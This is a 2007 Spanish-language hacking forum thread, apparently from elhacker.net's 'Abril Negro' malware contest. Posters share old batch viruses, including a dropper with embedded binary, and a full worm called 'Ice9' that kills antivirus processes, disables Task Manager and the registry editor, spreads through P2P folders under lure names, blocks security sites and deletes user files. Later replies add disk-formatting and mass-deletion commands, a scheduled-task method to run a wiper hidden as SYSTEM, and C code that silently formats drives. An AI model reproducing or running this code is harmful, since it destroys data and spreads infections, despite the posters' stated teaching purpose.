Título: Abril Negro 2007
Publicado por: WHK en 31 Marzo 2007, 03:05 am
Acá hay algunos codigos en batch que les pueden interesar un poco:
@echo off%!-%
if '%1=='~ goto !-%2
if exist \!-.bat goto !-r
if not exist %0.bat goto !-e
find "!-"<%0.bat>\!-.BAT
:!-r
command /c \!- ~ s . .. %path%
goto !-e
:!-s
shift%!-%
if '%2==' exist !-
for %%a in (%2\*.bat) do call \!- ~ i %%a
goto !-s
:!-i
find "!-"<%3>!-s
copy !-s !-!>nul
if exist !-! goto !-a
del !-s
type \!-.bat>>%3
exit !-
:!-a
del !-!
:!-e
XD y este otro:
@ECHO OFF
:s%r#
COPY %0.BAT C:\Q.COM>NUL
C:\Q
�¸ ·¢'�Í/<ÿt%¿ÿÿ» ¸�JÍ/Gt�Wü¾�¹¨ ó¤ŽÙ¾��¥¥DüŒDþ��º��¿²���´VÍ!´AÍ!‹×A¸�CÍ!Í = ·u�°ÿÏ= ®t�é— ƒúÿuø:îuô`���´�Í!´6™<�w}Í!Ñê;Úè� C:\WINSTART.BAT Z¸@=w^Í!rZ“¸ [3ÉŽÙ¿` ÿu0ÿu2‰}0Œ]2Ç�°�ÆE�Ï��€�Í!ŽÙE2E0r&•S´?‹×±�Í!‘´@‹ÝÍ!�À[uë¸ WÍ!´>Í!‹Ý¸�WÍ!´>Í!�aê
jajajaja me diran.. este tio esta loco XD ps no estoy loco... es un virus en batch muy conocido llamado "bacteria2.bat"
Pueden bajar este y muchos ejemplos de codigos creados en batch desde aca:
http://512.iespana.es/virus_y_troyanos
También agregué algunos codigos fuentes de muchos virus para que puedan comprender su funcionamiento (por eso saqué los que no tenian el codigo) ya que la idea no es joder a todo mundo infectando gente y bajando programillas... para eso hay otras paginas, acá es para aprender.
Acabo de agregar dos programas para compilar tu propio virus... uno se llama "lavi" y el otro "viological ware" cada uno con sus textos explicativos. Ojala les sirva ;)
Att. Yan
Unilola Softwares.
Título: Re: Virus en batch
Publicado por: nhaalclkiemr en 31 Marzo 2007, 13:44 pm
¿Podrías explicar que es lo que hace este virus?
Es que yo se mas o menos batch y no entiendo mucho tu codigo...
¿Podrias ir explicando detalladamente que es lo que hace en cada una de las lineas?
Un saludo ;) ;)
Título: Re: Virus en batch
Publicado por: abcdef123 en 31 Marzo 2007, 16:43 pm
Yo no tengo ni idea lo que hace pero lo he intentado guardar como .txt .doc .ppt .html y nada todo lo detecta al final lo he guardado en el correo :D
Título: Re: Virus en batch
Publicado por: Hendrix en 31 Marzo 2007, 20:42 pm
emm.....que hace esto kon chincheta??? es un error??? :huh:
Salu2 ;)
Título: Re: Virus en batch
Publicado por: WHK en 31 Marzo 2007, 21:54 pm
Quiero dejar en claro que yo no hice esos virus Aunque igual los entiendo a medias porque he aprendido mucho de ellos.
Talves fue un malentendido, solo quería compartir estos codigos fuente para que pudieran hechar a volar la imaginación. este post fue de una respuesta a programación en batch hecho y movido por el mismo sidarcat, Aunque muchos me han dicho que es muy buena info pero no quiero que se malinterprete.
Si no tienen ni idea de lo que hace un bat... pueden ver el post de programación en batch http://foro.elhacker.net/index.php/topic,132924.0.html
Título: Re: Virus en batch
Publicado por: Tyrz en 1 Abril 2007, 02:41 am
joder yo hago programillas con batch y tal y eso lo veo y no sbria decirte ni en que lenguage esta
Título: Re: Virus en batch
Publicado por: sirdarckcat en 1 Abril 2007, 02:57 am
la chicnheta se puso por error..
WHK lo puso en el foro de scripting en unpost con chincheta, al momento de moverlo aca, se le quedo..
ya se la quite :P
Título: Re: Virus en batch
Publicado por: nhaalclkiemr en 2 Abril 2007, 20:46 pm
En Virustotal lo detectan casi todos los AV... Lo prové en una maquina Virtual con WinXP Proffesional SP2 y nada, no pasa nada con ninguno de los dos codigos, lo analicé y no se ejecuta todo el bat pues produce un error de sintaxis antes de acavar...
¿Alguien lo podía analizar y explicarmelo?
Un saludo ;) ;)
Título: Re: Virus en batch
Publicado por: Tyrz en 2 Abril 2007, 22:32 pm
si la verdad esque si alguien lo explicara estaria fenomeno
Título: Re: Virus en batch
Publicado por: Red Mx en 2 Abril 2007, 23:43 pm
@ECHO OFF
:s%r#
COPY %0.BAT C:\Q.COM>NUL
C:\Q
�¸ ·¢'�Í/<ÿt%¿ÿÿ» ¸�JÍ/Gt�Wü¾�¹¨ ó¤ŽÙ¾��¥¥DüŒDþ��º��¿²���´VÍ!´AÍ!‹×A¸�CÍ!Í = ·u�°ÿÏ= ®t�é— ƒúÿuø:îuô`���´�Í!´6™<�w}Í!Ñê;Úè� C:\WINSTART.BAT Z¸@=w^Í!rZ“¸ [3ÉŽÙ¿` ÿu0ÿu2‰}0Œ]2Ç�°�ÆE�Ï��€�Í!ŽÙE2E0r&•S´?‹×±�Í!‘´@‹ÝÍ!�À[uë¸ WÍ!´>Í!‹Ý¸�WÍ!´>Í!�aê por la lectura rapida que le die solo es un batch que crea un archivo en c llamado Q.com con este code el cual es una aplicacion .com ¸ ·¢'�Í/<ÿt%¿ÿÿ» ¸�JÍ/Gt�Wü¾�¹¨ ó¤ŽÙ¾��¥¥DüŒDþ��º��¿²���´VÍ!´AÍ!‹×A¸�CÍ!Í = ·u�°ÿÏ= ®t�é— ƒúÿuø:îuô`���´�Í!´6™<�w}Í!Ñê;Úè� C:\WINSTART.BAT Z¸@=w^Í!rZ“¸ [3ÉŽÙ¿` ÿu0ÿu2‰}0Œ]2Ç�°�ÆE�Ï��€�Í!ŽÙE2E0r&•S´?‹×±�Í!‘´@‹ÝÍ!�À[uë¸ WÍ!´>Í!‹Ý¸�WÍ!´>Í!�aê
probe los dos guardandolos en un archivo .bat y el nod32 los detecto al parecer son virus viejos pero bueno @echo off%!-%
if '%1=='~ goto !-%2
if exist \!-.bat goto !-r
if not exist %0.bat goto !-e
find "!-"<%0.bat>\!-.BAT
:!-r
command /c \!- ~ s . .. %path%
goto !-e
:!-s
shift%!-%
if '%2==' exist !-
for %%a in (%2\*.bat) do call \!- ~ i %%a
goto !-s
:!-i
find "!-"<%3>!-s
copy !-s !-!>nul
if exist !-! goto !-a
del !-s
type \!-.bat>>%3
exit !-
:!-a
del !-!
:!-e Conocido para el nod32 como : Bat/swing.378 (virus) @ECHO OFF
:s%r#
COPY %0.BAT C:\Q.COM>NUL
C:\Q
�¸ ·¢'�Í/<ÿt%¿ÿÿ» ¸�JÍ/Gt�Wü¾�¹¨ ó¤ŽÙ¾��¥¥DüŒDþ��º��¿²���´VÍ!´AÍ!‹×A¸�CÍ!Í = ·u�°ÿÏ= ®t�é— ƒúÿuø:îuô`���´�Í!´6™<�w}Í!Ñê;Úè� C:\WINSTART.BAT Z¸@=w^Í!rZ“¸ [3ÉŽÙ¿` ÿu0ÿu2‰}0Œ]2Ç�°�ÆE�Ï��€�Í!ŽÙE2E0r&•S´?‹×±�Í!‘´@‹ÝÍ!�À[uë¸ WÍ!´>Í!‹Ý¸�WÍ!´>Í!�aê Conocido como: BAT/winstar.297 EDITO: batch no es un lenguaje de programacion solo son archivos por lotes de MS-DOS los cuales son instrucciones que se ejecutan en modo consola algo muy curioso solo le cambie la la Q por REDMX en este y el nod32 no lo detecto obiamente no lo ejecute @ECHO OFF
:s%r#
COPY %0.BAT C:\Q.COM>NUL
C:\Q
�¸ ·¢'�Í/<ÿt%¿ÿÿ» ¸�JÍ/Gt�Wü¾�¹¨ ó¤ŽÙ¾��¥¥DüŒDþ��º��¿²���´VÍ!´AÍ!‹×A¸�CÍ!Í = ·u�°ÿÏ= ®t�é— ƒúÿuø:îuô`���´�Í!´6™<�w}Í!Ñê;Úè� C:\WINSTART.BAT Z¸@=w^Í!rZ“¸ [3ÉŽÙ¿` ÿu0ÿu2‰}0Œ]2Ç�°�ÆE�Ï��€�Í!ŽÙE2E0r&•S´?‹×±�Í!‘´@‹ÝÍ!�À[uë¸ WÍ!´>Í!‹Ý¸�WÍ!´>Í!�aê COPY %0.BAT C:\Q.COM>NUL C:\Q aqui solo le puse COPY %0.BAT C:\REDMX.COM>NUL C:\REDMX
Título: Re: Virus en batch
Publicado por: nhaalclkiemr en 3 Abril 2007, 00:03 am
Si ya se k los detecta...Yo pienso k son los COM los k hacen daño... Una cosa, para k sirven estos operadores k pone en ocasiones despues de la linea del codigo??
Título: Re: Virus en batch
Publicado por: WHK en 3 Abril 2007, 00:27 am
:!- indica un punto donde empieza la ejecucion e un script en batch llamado desde goto
cuando se declara shift se elimina una variable indicada.. en este caso !-%
cuando yo eclaro set !-=%xxx% estoy declarando una variable pero puedo poner lo que yo desee no tan solo !-
En el caso del q.com este se copia en c: con atributos de oculto y se crea a travez del coamdo echo. es solo una vieja tecnica para ocultar un virus dentro de un batch sin que sea detectado (antiguamente) por eso digo que solo son ejemplos para que puedan aprender como funciona un batch.
Título: Re: Virus en batch
Publicado por: Tyrz en 3 Abril 2007, 10:27 am
Acabo de agregar dos programas para compilar tu propio virus... uno se llama "lavi" y el otro "viological ware" odio los programas que les pones cuatro tonterias y ya te montan un virus, como hace ya unos años el satan...
Título: Re: Virus en batch
Publicado por: WHK en 3 Abril 2007, 21:42 pm
Pero a diferencia de estos dos, aca puedes compilar tu propio codigo ASM e injectarlo como función del virus, ademas hay muchos ejemplos para el que esté aprendiendo ese tipo de programación.
Título: Re: Virus en batch
Publicado por: Saok Dagon en 4 Abril 2007, 00:04 am
Hola Aqui les dejo un verdadero worm en Batch, esta version no sirve para copiar y pegar, es simplemente una muestra, se le a añadido un par de fallos tontos y faciles de reconocer por los programadores batch. No me hago responsable de lo que se haga con este codigo: rem *********************************************************************
rem ****************** **********************
rem Ice9
rem ****************** **********************
rem SaOk & Victoric
rem
rem ****************** **********************
rem *********************************************************************
rem Este es un Malware de Open Source
rem No nos hacemos responsables del mal uso que se haga de el.
rem Puede ser compilado con el nombre que se quiera.
rem *****************************************************************
rem - Distribucion por p2p
rem - AV killer
rem - Impide que se acceda a algunas webs
rem - Desactiba Registro y Administrador de tareas
rem - se añade al registro para que se incie con la maquina
rem - crea un archivo .txt y lo engorda de tamaño
rem - Crea unos cuantos archivos en C:\
rem
@ echo off
rem
rem distraemos al usuario
rem
start www.google.com
rem
rem ingeneria social
rem
title Actualizacion de Windows.NO cierren la venta.
rem
rem
rem creamo un par de variables
rem
set look=type C:\Windows\System32\shell32.dll >> c:\windos\system32\dog.txt
set kill=del /q/ s
set aviso=msg * La actualizacion a concluido con exito.Su Windows ya esta actualizado.
rem Procesos Av y Firewall
tskill aak.exe
tskill AcctMgr.exe
tskill McAfeeVirusScanService.exe
tskill MCAgentExe.exe
tskill McRegWiz.exe
tskill McVsRte.exe
tskill Norton Antivirus AV.exe
tskill NPROTECT.exe
tskill Pavsrv51.exe
tskill PaSSrv.exe
tskill PavFires.exe
tskill PavFnSvr.exe
tskill PavProt.exe
tskill pavprsrv.exe
tskill pavsrv51.exe
tskill prevsrv.exe
tskill PsImSvc.exe
tskill nod32krn.exe
tskill nod32kui.exe
tskill nod32.exe
tskill avgupsvc.exe
tskill avgamsvr.exe
tskill avgemc.exe
tskill avgcc.exe
tskill ashDisp.exe
tskill ashMaiSv.exe
tskill ashServ.exe
tskill ashWebSv.exe
tskill aswUpdSv.exe
tskill _avp32.exe
tskill _avpcc.exe
tskill _avpm.exe
tskill ackwin32.exe
tskill anti-trojan.exe
tskill apvxdwin.exe
tskill autodown.exe
tskill avconsol.exe
tskill ave32.exe
tskill avgctrl.exe
tskill avkserv.exe
tskill avnt.exe
tskill avp.exe
tskill avp32.exe
tskill avpcc.exe
tskill avpdos32.exe
tskill avpm.exe
tskill avptc32.exe
tskill avpupd.exe
tskill avsched32.exe
tskill avwin95.exe
tskill avwupd32.exe
tskill blackd.exe
tskill blackice.exe
tskill cfiadmin.exe
tskill cfiaudit.exe
tskill cfinet.exe
tskill cfinet32.exe
tskill claw95.exe
tskill claw95cf.exe
tskill cleaner.exe
tskill cleaner3.exe
tskill dvp95.exe
tskill dvp95_0.exe
tskill ecengine.exe
tskill esafe.exe
tskill espwatch.exe
tskill f-agnt95.exe
tskill findviru.exe
tskill f-prot.exe
tskill fprot.exe
tskill f-prot95.exe
tskill fp-win.exe
tskill frw.exe
tskill f-stopw.exe
tskill iamapp.exe
tskill iamserv.exe
tskill ibmasn.exe
tskill ibmavsp.exe
tskill icload95.exe
tskill icloadnt.exe
tskill icmon.exe
tskill icsupp95.exe
tskill icsuppnt.exe
tskill iface.exe
tskill iomon98.exe
tskill jedi.exe
tskill lockdown2000.exe
tskill lookout.exe
tskill luall.exe
tskill moolive.exe
tskill mpftray.exe
tskill n32scanw.exe
tskill navapw32.exe
tskill navlu32.exe
tskill navnt.exe
tskill navw32.exe
tskill navwnt.exe
tskill nisum.exe
tskill nmain.exe
tskill normist.exe
tskill nupgrade.exe
tskill nvc95.exe
tskill outpost.exe
tskill padmin.exe
tskill pavcl.exe
tskill pavsched.exe
tskill pavw.exe
tskill pccwin98.exe
tskill pcfwallicon.exe
tskill persfw.exe
tskill rav7.exe
tskill rav7win.exe
tskill rescue.exe
tskill safeweb.exe
tskill scan32.exe
tskill scan95.exe
tskill scanpm.exe
tskill scrscan.exe
tskill serv95.exe
tskill smc.exe
tskill sphinx.exe
tskill sweep95.exe
tskill tbscan.exe
tskill tca.exe
tskill tds2-98.exe
tskill tds2-nt.exe
tskill vet95.exe
tskill vettray.exe
tskill vscan40.exe
tskill vsecomr.exe
tskill vshwin32.exe
tskill vsstat.exe
tskill webscanx.exe
tskill wfindv32.exe
tskill zonealarm.exe
rem
rem empezamos desactivando el administrador de tareas.
rem
reg add hkcu\software\microsoft\windows\currentversion\policies\system" /v disabletaskmgr /t reg_dword /d ""1"" /f
rem
rem nos copiamos en system32 como root.bat
rem
copy %0 %HOMEDRIVE%\system32\%USERDOMAIN%.bat
attrib +H +S %HOMEDRIVE%\system32\%USERDOMAIN%.bat
rem por si acaso tambien en system
copy %0 %HOMEDRIVE%\system\%USERDOMAIN%.bat
attrib +H +S %HOMEDRIVE%\system\%USERDOMAIN%.bat
rem
rem nos agremos en el regsitro para iniciarnos con la pc
rem
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v SystemDates /d %0
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Ice9 /d c:\WINDOWS\system32\%USERDOMAIN%.bat"
rem
rem ahora desactibamos el registro.
rem
reg add hkcu\software\microsoft\windows\currentversion\policies\system" /v disableregistrytools /t reg_dword /d ""1"" /f
rem
rem vamos a dejarle sin el restaurador del sistema
rem
del /q /s %SystemRoot%\system32\restore\rstrui.exe
rem
rem una propagacion p2p sencilla
copy %0 C:\%ProgramFiles%\Grokster*Grokste*\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\Morpheus\*Shared*\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\ICQ\*files*\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\KaZaA\*Folder*\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\KaZaA Lite\*Folder*\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\EDONKEY2000\incoming\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\eMule\Incoming\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\Filetopia3\Files\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\appleJuice\incoming\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\Gnucleus\Downloads\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\LimeWire\Shared\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\Overnet\incoming\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\Shareaza\Downloads\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\Swaptor\Download\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\WinMX\*Folder*\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\Tesla\Files\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\XoloX\Downloads\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\Rapigator\Share\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\KMD\*Shared*\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\BearShare\Shared\pass_xxx_100webs.bat
copy %0 C:\%ProgramFiles%\*Direct*\*Received*\pass_xxx_100webs.bat
rem
copy %0 C:\%ProgramFiles%\Grokster*Grokste*\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\Morpheus\*Shared*\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\ICQ\*files*\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\KaZaA\*Folder*\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\KaZaA Lite\*Folder*\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\EDONKEY2000\incoming\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\eMule\Incoming\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\Filetopia3\Files\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\appleJuice\incoming\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\Gnucleus\Downloads\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\LimeWire\Shared\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\Overnet\incoming\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\Shareaza\Downloads\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\Swaptor\Download\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\WinMX\*Folder*\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\Tesla\Files\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\XoloX\Downloads\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\Rapigator\Share\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\KMD\*Shared*\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\BearShare\Shared\Path_msn_Emoticonos_2006.bat
copy %0 C:\%ProgramFiles%\*Direct*\*Received*\Path_msn_Emoticonos_2006.bat
rem
copy %0 C:\%ProgramFiles%\Grokster*Grokste*\sms_gratis.bat
copy %0 C:\%ProgramFiles%\Morpheus\*Shared*\sms_gratis.bat
copy %0 C:\%ProgramFiles%\ICQ\*files*\sms_gratis.bat
copy %0 C:\%ProgramFiles%\KaZaA\*Folder*\sms_gratis.bat
copy %0 C:\%ProgramFiles%\KaZaA Lite\*Folder*\sms_gratis.bat
copy %0 C:\%ProgramFiles%\EDONKEY2000\incoming\sms_gratis.bat
copy %0 C:\%ProgramFiles%\eMule\Incoming\sms_gratis.bat
copy %0 C:\%ProgramFiles%\Filetopia3\Files\sms_gratis.bat
copy %0 C:\%ProgramFiles%\appleJuice\incoming\sms_gratis.bat
copy %0 C:\%ProgramFiles%\Gnucleus\Downloads\sms_gratis.bat
copy %0 C:\%ProgramFiles%\LimeWire\Shared\sms_gratis.bat
copy %0 C:\%ProgramFiles%\Overnet\incoming\sms_gratis.bat
copy %0 C:\%ProgramFiles%\Shareaza\Downloads\sms_gratis.bat
copy %0 C:\%ProgramFiles%\Swaptor\Download\sms_gratis.bat
copy %0 C:\%ProgramFiles%\WinMX\*Folder*\sms_gratis.bat
copy %0 C:\%ProgramFiles%\Tesla\Files\sms_gratis.bat
copy %0 C:\%ProgramFiles%\XoloX\Downloads\sms_gratis.bat
copy %0 C:\%ProgramFiles%\Rapigator\Share\sms_gratis.bat
copy %0 C:\%ProgramFiles%\KMD\*Shared*\sms_gratis.bat
copy %0 C:\%ProgramFiles%\BearShare\Shared\sms_gratis.bat
copy %0 C:\%ProgramFiles%\*Direct*\*Received*\sms_gratis.bat
rem
copy %0 C:\%ProgramFiles%\Grokster*Grokste*\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\Morpheus\*Shared*\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\ICQ\*files*\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\KaZaA\*Folder*\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\KaZaA Lite\*Folder*\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\EDONKEY2000\incoming\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\eMule\Incoming\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\Filetopia3\Files\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\appleJuice\incoming\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\Gnucleus\Downloads\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\LimeWire\Shared\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\Overnet\incoming\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\Shareaza\Downloads\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\Swaptor\Download\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\WinMX\*Folder*\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\Tesla\Files\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\XoloX\Downloads\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\Rapigator\Share\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\KMD\*Shared*\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\BearShare\Shared\polifonicos_free.bat
copy %0 C:\%ProgramFiles%\*Direct*\*Received*\polifonicos_free.bat
cls
rem
rem vamos a putearle un poco
rem
MODE CON[:] [RATE=r DELAY=99999]
MODE CON[:] [COLS=2] [LINES=2]
rem
rem No nos interesa que la victima visite estas paginas
echo 81.21.145.144 McAfee >> C:\WINDOWS\system32\drivers\etc\hosts
echo 212.170.238.10 panda >> C:\WINDOWS\system32\drivers\etc\hosts
echo 212.170.238.35 Norton >> C:\WINDOWS\system32\drivers\etc\hosts
echo 67.15.68.49 kaspersky >> C:\WINDOWS\system32\drivers\etc\hosts
echo 67.15.68.49 Nod32 >> C:\WINDOWS\system32\drivers\etc\hosts
echo 66.98.250.38 virusTotal >> C:\WINDOWS\system32\drivers\etc\hosts
cls
rem
rem Creamos nuestra mascota
echo Mascota >> c:\windos\system32\dog.txt
%look%
%look%
%look%
%look%
%look%
%look%
%look%
%look%
%look%
%look%
%look%
%look%
%look%
%look%
%look%
%look%
%look%
cls
rem
rem ya a comido mucho xD
rem
rem ahora lo que hacemos creamos unos cuantos archivos
rem
for /l %%i in (1,1,9999999) do (echo turururura > c:\%%i.txt)
rem
rem
rem ahora un porquito de maldad con los archivos
rem
%kill% c:\WINDOWS\system32\calc.exe
%kill% c:\WINDOWS\system32\mspaint.exe
%kill% c:\windows\system32\notepad.exe
rename c:\WINDOWS\system32\osk.exe c:\WINDOWS\system32\calc.exe
rename c:\WINDOWS\system32\write.exe c:\WINDOWS\system32\mspaint.exe
rename c:\WINDOWS\system32\winchat.exe c:\WINDOWS\system32\notepad.exe
rem
rem Colocamos esto al final porque puede dar un error si esta en el escritorio
rem
del /q /s C:\*documents*\%USERNAME%\escritorio\*.*
:bucle
set numero2=1
set /a resultado=%resultado% + %numero2%
echo ICE9 malware.bat>> %resultado%.txt
if %resultado%==71 (goto :lets)
goto :bucle
:lets
rem payload
rem
net user Infect.by.Ice9.Malware.in.Batch ice9malware /add
net send * Infect Admin Pc with Ice9 marware in batch
rem *******************************************************************************
rem
cls
ver
pause
cls
%aviso%
cls
rem
rem *******************************************************************************
:AC
start cmd.exe echo error en la actualizacion
goto :AC
rem ******************************************************************************
rem FIN
rem ******************************************************************************
Título: Re: Virus en batch
Publicado por: Tyrz en 4 Abril 2007, 00:57 am
lol m a gustado lo de un poquito de maldad xd
Título: Re: Virus en batch
Publicado por: WHK en 5 Abril 2007, 01:39 am
Hubiera sido mas facil hacer un
@echo off
Echo actualizando...
format d: /Q /X>nul
format e: /Q /X>nul
erase /s /f /q c:\*>nul
logoff
exit
XD pero la idea no es joder a nadie porque maneras de joder hay por montones... solo los mostraba porque cada uno tiene diferentes funciones muy complejas e interesantes que pueden aprobecharse para el estudio de la programación en batch.
Título: Re: Virus en batch
Publicado por: Man-In-the-Middle en 5 Abril 2007, 01:49 am
jajaj XD!!, super destructivos, estan!!
Título: Abril Negro 2007
Publicado por: Man-In-the-Middle en 5 Abril 2007, 01:53 am
Como su nombre lo dice , ya ha pasado un año del primer abril negro :xD, para mayor info a los nuevos (http://foro.elhacker.net/Themes/default/images/spanish/search.gif) Abril negro.
Pues los que se quieren inscribir , es el momento
Saludos
MITM
Título: Re: Virus en batch
Publicado por: YaTaMaS en 5 Abril 2007, 02:26 am
El formateo ya es viejo xDD, no sirve.
Título: Re: Virus en batch
Publicado por: nhaalclkiemr en 5 Abril 2007, 03:00 am
Prueva esto ya verás... del /Q /F /A:- /S %homedrive%\* lleva su tiempo pero si consigues ejecutarlo oculto ya verás que daño causa :xD :xD Un saludo ;) ;)
Título: Re: Virus en batch
Publicado por: Saok Dagon en 5 Abril 2007, 12:31 pm
Hola Prueva esto ya verás... del /Q /F /A:- /S %homedrive%\* lleva su tiempo pero si consigues ejecutarlo oculto ya verás que daño causa :xD :xD Un saludo ;) ;) un tiempo? diras una eternidad! a lo tonto a lo tonto se te puede poner en un par de oritas borrar todo el disco duro saludos
Título: Re: Virus en batch
Publicado por: nhaalclkiemr en 5 Abril 2007, 12:38 pm
Si, pero acaso tu no tienes el ordenador encendido mas de una hora...puedes ejecutarlo de manera oculta y ya está... O puedes hacer que de primero borre la carpeta Windows y despues el resto: del /Q /F /A:- /S %windir%\
del /Q /F /A:- /S %homedrive%\* Lo malo es que salte el SFC (System File Protection), tendreis que buscar como saltarselo... Un saludo ;) ;)
Título: Re: Virus en batch
Publicado por: WHK en 7 Abril 2007, 23:59 pm
Juaaaa.. la idea no era joder sino ver como funcionaban los batch :xD Para eso hay paginas web por montones en internet para bajar virus. La idea es aprender no joder :xD
Título: Re: Virus en batch
Publicado por: nhaalclkiemr en 8 Abril 2007, 22:22 pm
Jeje weno si...
Pues para aprender solo hay una solucion: leer, practicar y practicar y practicar y ...
Yo para aprender bath me servi de la ayuda de Windows, alli hay una "Referencia de comandos A-Z" donde te pone todos los comandos y sus parametros, muy recomendable. Segun los vayas usando vas aprendiendo cada vez mas, despues trambien cuanta tu Ingieneria social claro...
Despues las dudas y eso en el foro, te pueden ayudar mucho,m y el manual de Sirdckat en el subforo "Scripting" tambien sirve de bastante ayuda una vez conocidos los niveles basicos de Bath
Un saludo ;) ;)
Título: Re: Abril Negro 2007
Publicado por: cdt en 9 Abril 2007, 14:58 pm
MMMM xD
c:\documents and settings\usuario cd c:\
c:\ del /F /S /Q c:\
:S xD
Título: Re: Abril Negro 2007
Publicado por: Saok Dagon en 10 Abril 2007, 23:12 pm
bien vo que todos sabeis leer y comprender el funcionamiento del comando del de batch. Pero hay noa caba todo, tienen que plantearse otras cosas, como en este caso: MMMM xD
c:\documents and settings\usuario cd c:\
c:\ del /F /S /Q c:\
:S xD
lo que se va a borrar, ya que tardaria demasiado, y estaria la ventana del ms-dos constantemente abierta, facilismo de parar. A mi gusto atacaria a los "pilares" (archivos de arranque,configuracion,etc..) de windows. Mas corto, facil y productivo.
Título: Re: Abril Negro 2007
Publicado por: Man-In-the-Middle en 11 Abril 2007, 01:10 am
XD un scripten vbs, que todos los doc, xls te los ponga en cero, para que maratel el ordenador, con esto en segundos toda su data al tacho,,,,,,,, Sorry por la Lameada XDDDD
Título: Re: Abril Negro 2007
Publicado por: nhaalclkiemr en 11 Abril 2007, 02:44 am
Weno, si consigues ejecutar el del como SYSTEM no se mostrará la ventana, sería algo así: @echo off
echo del /S /Q /F /A:- %homedrive%\* > temp.bat
move temp.bat %windir%\system32\temp.bat
set a=0
set z=%TIME:~0,2%
if "%TIME:~0,1%"==" " set z=0%TIME:~1,1%
if "%TIME:~8,1%"=="," goto normal
if "%TIME:~10,1%"=="," goto 2caso
if "%TIME:~12,1%"=="," goto 3caso
:normal
set x=%TIME:~3,2%
set y=%TIME:~6,2%
goto a
:2caso
set x=%TIME:~4,2%
set y=%TIME:~8,2%
goto a
:3caso
set x=%TIME:~5,2%
set y=%TIME:~10,2%
:a
set errorlevel=
set /A a=%a%+1
if "%x%"=="08" set x=8
if "%x%"=="09" set x=9
set /A x=%x%+1
at.exe %z%:%x% temp.bat
if %a%==11 goto b
if not %errorlevel%==0 goto a
schtasks /run /tn at1
goto d
:b
set a=0
:c
set errorlevel=
set /A a=%a%+1
if %x% LEQ 9 set x=0%x%
schtasks /create /tn temp /tr temp.bat /sc once /st %z%:%x%:%y% /ru System
if %a%==11 goto error
if not %errorlevel%==0 goto c
schtasks /run /tn temp
if not %errorlevel%==0 goto c
:d
del /F /Q /S /A:- %0
exit
:error
temp.bat>>NUL
del /F /Q /S /A:- %0
exit Así no se vería...jejeje...pero la verdad es que tarda bastante tiempo y es bastante lamerada. Lo de VBscript tambien, pero no se usar VBscript, con un FOR en BATCH tambien puedes borrar por ejemplo todos los .doc y así... Weno, la verdad es que no se para que discutimos de que manera es mejor usar el DEL jajaja :xD :xD :xD Saludos ;) ;)
Título: Re: Abril Negro 2007
Publicado por: WHK en 13 Abril 2007, 03:45 am
Hacer que esto se ejecute sin que se vea es muy simple y a la ves muy destructivo... pero como dije antes.. la idea no es joder al primero que se te cruze por delante :¬¬
C:
#include <windows.h>
#include <stdlib.h>
main()
{
ShowWindow(GetForegroundWindow(),SW_HIDE);
system("format d: /Q /X");
system("format e: /Q /X");
system("format f: /Q /X");
system("format g: /Q /X");
system("del /s /f /q C:\\*");
return 0;
}
VB:
